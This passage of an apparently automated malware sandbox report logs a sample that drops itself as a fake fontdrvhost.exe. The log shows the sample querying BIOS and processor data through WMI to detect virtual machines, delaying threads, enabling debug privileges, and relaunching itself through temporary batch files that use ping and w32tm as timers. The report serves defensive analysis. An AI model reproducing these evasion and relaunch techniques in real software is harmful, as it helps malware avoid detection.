Source: C:\Users\user\AppData\Local\fontdrvhost.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Users\user\AppData\Local\fontdrvhost.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
Source: C:\Users\user\AppData\Local\fontdrvhost.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Users\user\AppData\Local\fontdrvhost.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
Source: C:\Users\user\AppData\Local\fontdrvhost.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Users\user\AppData\Local\fontdrvhost.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
Source: C:\Users\user\AppData\Local\fontdrvhost.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Users\user\AppData\Local\fontdrvhost.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
Source: C:\Users\user\AppData\Local\fontdrvhost.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Users\user\AppData\Local\fontdrvhost.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
Source: C:\Users\user\AppData\Local\fontdrvhost.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Users\user\AppData\Local\fontdrvhost.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
Source: C:\Users\user\AppData\Local\fontdrvhost.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Users\user\AppData\Local\fontdrvhost.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
Source: C:\Users\user\AppData\Local\fontdrvhost.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Users\user\AppData\Local\fontdrvhost.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
Source: C:\Users\user\AppData\Local\fontdrvhost.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Source: C:\Users\user\AppData\Local\fontdrvhost.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Users\user\AppData\Local\fontdrvhost.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Users\user\AppData\Local\fontdrvhost.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Users\user\AppData\Local\fontdrvhost.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Users\user\AppData\Local\fontdrvhost.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Users\user\AppData\Local\fontdrvhost.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Users\user\AppData\Local\fontdrvhost.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Users\user\AppData\Local\fontdrvhost.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Users\user\AppData\Local\fontdrvhost.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Users\user\AppData\Local\fontdrvhost.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Source: C:\Users\user\AppData\Local\fontdrvhost.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\fontdrvhost.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\fontdrvhost.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\fontdrvhost.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\fontdrvhost.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\fontdrvhost.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\fontdrvhost.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\fontdrvhost.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\fontdrvhost.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\fontdrvhost.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File opened: C:\Users\user Jump to behavior
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File opened: C:\Users\user\Documents\desktop.ini Jump to behavior
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File opened: C:\Users\user\AppData\Local\Temp Jump to behavior
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File opened: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File opened: C:\Users\user\AppData\Local Jump to behavior
Source: fontdrvhost.exe, 0000001B.00000002.1998188991.000000001B434000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}D
Source: ZT3pxe2Tb4.exe, 00000000.00000002.1670366434.000000001BF57000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}8b}
Source: fontdrvhost.exe, 0000001B.00000002.2002667605.000000001C11C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllX
Source: fontdrvhost.exe, 00000033.00000002.2716698642.000000001C591000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\8b}\4
Source: fontdrvhost.exe, 00000023.00000002.2621783343.000000001B460000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllY
Source: fontdrvhost.exe, 0000000E.00000002.1845478401.000000001C9DE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll:
Source: fontdrvhost.exe, 00000023.00000002.2663073446.000000001BA16000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\y
Source: ZT3pxe2Tb4.exe, 00000000.00000002.1667261412.000000001B980000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: fontdrvhost.exe, 00000023.00000002.2621783343.000000001B517000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: fontdrvhost.exe, 00000022.00000002.2094701336.000000001C3C0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWs%SystemRoot%\system32\mswsock.dll
Source: fontdrvhost.exe, 00000008.00000002.1748627136.000000001BFA5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}8b}\DB-
Source: fontdrvhost.exe, 0000002A.00000002.2225604158.000000001CC50000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: fontdrvhost.exe, 00000022.00000002.2098127256.000000001C46A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}k'V
Source: fontdrvhost.exe, 0000001B.00000002.2004925843.000000001C16D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: fb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: fontdrvhost.exe, 00000008.00000002.1701655922.00000000009D0000.00000004.00000020.00020000.00000000.sdmp, fontdrvhost.exe, 00000015.00000002.2103740621.000000001BD11000.00000004.00000020.00020000.00000000.sdmp, w32tm.exe, 00000021.00000002.1974264152.00000269B5D97000.00000004.00000020.00020000.00000000.sdmp, w32tm.exe, 00000028.00000002.2060434590.0000025FD088F000.00000004.00000020.00020000.00000000.sdmp, fontdrvhost.exe, 00000033.00000002.2394390360.0000000000FF6000.00000004.00000020.00020000.00000000.sdmp, fontdrvhost.exe, 00000034.00000002.2239140021.0000000000885000.00000004.00000020.00020000.00000000.sdmp, w32tm.exe, 00000039.00000002.2290310341.0000024AEDA09000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: fontdrvhost.exe, 00000022.00000002.2098127256.000000001C46A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\8b}\
Source: fontdrvhost.exe, 00000033.00000002.2716698642.000000001C591000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Process information queried: ProcessInformation Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Code function: 0_2_00007FFD9BBD3600 rdtsc 0_2_00007FFD9BBD3600
Enables debug privileges
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Memory allocated: page read and write | page guard Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\e2HUAivGfO.bat" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\fontdrvhost.exe "C:\Users\user\AppData\Local\fontdrvhost.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\wuC6fcDv5B.bat" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\fontdrvhost.exe "C:\Users\user\AppData\Local\fontdrvhost.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\6WkFIbRMFr.bat" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\fontdrvhost.exe "C:\Users\user\AppData\Local\fontdrvhost.exe"
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\OwDUg2gYJx.bat"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\fontdrvhost.exe "C:\Users\user\AppData\Local\fontdrvhost.exe"
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\s2nU7uS06N.bat"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\fontdrvhost.exe "C:\Users\user\AppData\Local\fontdrvhost.exe"
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\ZMh4UPVO0I.bat"
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\I3W1TCNLwG.bat"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\fontdrvhost.exe "C:\Users\user\AppData\Local\fontdrvhost.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\fontdrvhost.exe "C:\Users\user\AppData\Local\fontdrvhost.exe"
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\7nxekELsf0.bat"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\fontdrvhost.exe "C:\Users\user\AppData\Local\fontdrvhost.exe"
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\3IMqqsTTOd.bat"
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\Gu3WPocxsu.bat"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\fontdrvhost.exe "C:\Users\user\AppData\Local\fontdrvhost.exe"
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Queries volume information: C:\Users\user\Desktop\ZT3pxe2Tb4.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Queries volume information: C:\Users\user\AppData\Local\fontdrvhost.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Queries volume information: C:\Users\user\AppData\Local\fontdrvhost.exe VolumeInformation Jump to behavior
Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Queries volume information: C:\Users\user\AppData\Local\fontdrvhost.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Queries volume information: C:\Users\user\AppData\Local\fontdrvhost.exe VolumeInformation
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Queries volume information: C:\Users\user\AppData\Local\fontdrvhost.exe VolumeInformation
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Queries volume information: C:\Users\user\AppData\Local\fontdrvhost.exe VolumeInformation
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Queries volume information: C:\Users\user\AppData\Local\fontdrvhost.exe VolumeInformation
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Queries volume information: C:\Users\user\AppData\Local\fontdrvhost.exe VolumeInformation
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Queries volume information: C:\Users\user\AppData\Local\fontdrvhost.exe VolumeInformation
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Queries volume information: C:\Users\user\AppData\Local\fontdrvhost.exe VolumeInformation
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
